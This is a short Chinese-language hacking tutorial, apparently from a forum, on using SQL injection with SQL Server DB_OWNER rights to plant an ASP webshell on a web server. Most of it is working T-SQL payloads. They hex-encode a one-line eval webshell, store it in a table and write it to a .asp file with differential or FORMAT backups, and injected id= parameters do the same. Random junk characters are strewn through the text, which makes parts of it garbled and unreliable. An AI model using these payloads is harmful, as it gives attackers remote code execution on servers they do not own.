DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
6 z8 D7 c$ p5 t0 c# `# B
减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
9 Z8 N; Q9 g3 l6 q' o加一个参数WITH DIFFERENTIAL
0 r( b4 K$ p7 I! S2 y; T0 ]3 C
1
2
3
0 \7 z( U" W( W+ A! k- g4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
8 b  ^6 ^: i4 }7 Ccreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
1 o* m4 D, N( D5 {declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
, H1 q( X8 q' V# L$ v6 C7 E
' @- ?' Q7 w2 h/ H, [! P  l二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1
" W1 h4 Q9 j2 |# D3 ?2
+ g: H' a" c0 T& ~3
9 ?# |3 V2 L7 ^2 `: Q5 C) R( A4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
8 l, K" s7 I; X( h* C& F' s' {create table [dbo].[xiaolu] ([cmd] [image]);
# T$ T! R! }1 J$ L* @) xinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
0 T" o; G) A# {! R5 r8 Ldeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

+ |, [% o% x0 V& n总的来说就是那么简单几句,下面以备份数据库model为例子
$ w( k1 f$ _' g( [1
: ~) n! t% d& p' X, f7 Y! t
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

* I6 N8 L  M9 x+ W9 k( c2
4 J. ]1 ]( j' j% Y$ b9 h. a6 m
1
6 k) B1 L8 ]2 g% J3 Y id=1;backup database model to disk='你的路径‘ with differential,format;--
1 q$ F3 l. y& _